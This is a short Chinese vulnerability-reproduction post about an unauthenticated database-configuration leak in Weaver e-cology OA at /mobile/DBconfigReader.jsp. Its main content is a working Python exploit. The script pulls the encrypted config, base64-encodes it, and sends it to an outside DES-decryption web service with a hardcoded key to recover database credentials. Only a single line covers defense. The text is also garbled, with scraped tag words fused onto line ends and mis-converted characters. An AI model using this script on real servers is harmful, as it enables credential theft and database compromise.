[漏洞復現] 泛微ecology OA數據庫配置信息泄露

漏洞詳情

泛微e-cology OA系統/mobile/DBconfigReader.jsp存在未受權訪問,經過解密,可直接獲取數據庫配置信息。html

利用前提
/mobile/DBconfigReader.jsp存在未受權訪問。python

漏洞復現

利用github的exp報錯,解密踩坑以下:git

  1. 亂碼,須要用b64加密後用密鑰解密
  2. \r\n,詳見參考連接

最終python腳本以下:github

import base64
import requests
import ast

def req(url):
    headers =  {
        'Content-Type':'application/x-www-form-urlencoded',
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    }

    r1 = requests.get(url,headers=headers).content
    s = r1.replace('\r\n','')
    res1 = base64.b64encode(s)
    
    postdata = {
        'data':res1,
        'type':'des',
        'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'
    }
    u = 'http://tool.chacuo.net/cryptdes'
    r2 = requests.post(u,data=postdata,headers=headers).content 
    res2 = ast.literal_eval(r2)
    
    return res2['data']

url = 'http://testurl/mobile/DBconfigReader.jsp'
print req(url)

防護

禁止訪問/mobile/DBconfigReader.jspweb

參考數據庫

https://mp.weixin.qq.com/s/u8GIfMBRZFAN3HANSSSgQAapp

相關文章
相關標籤/搜索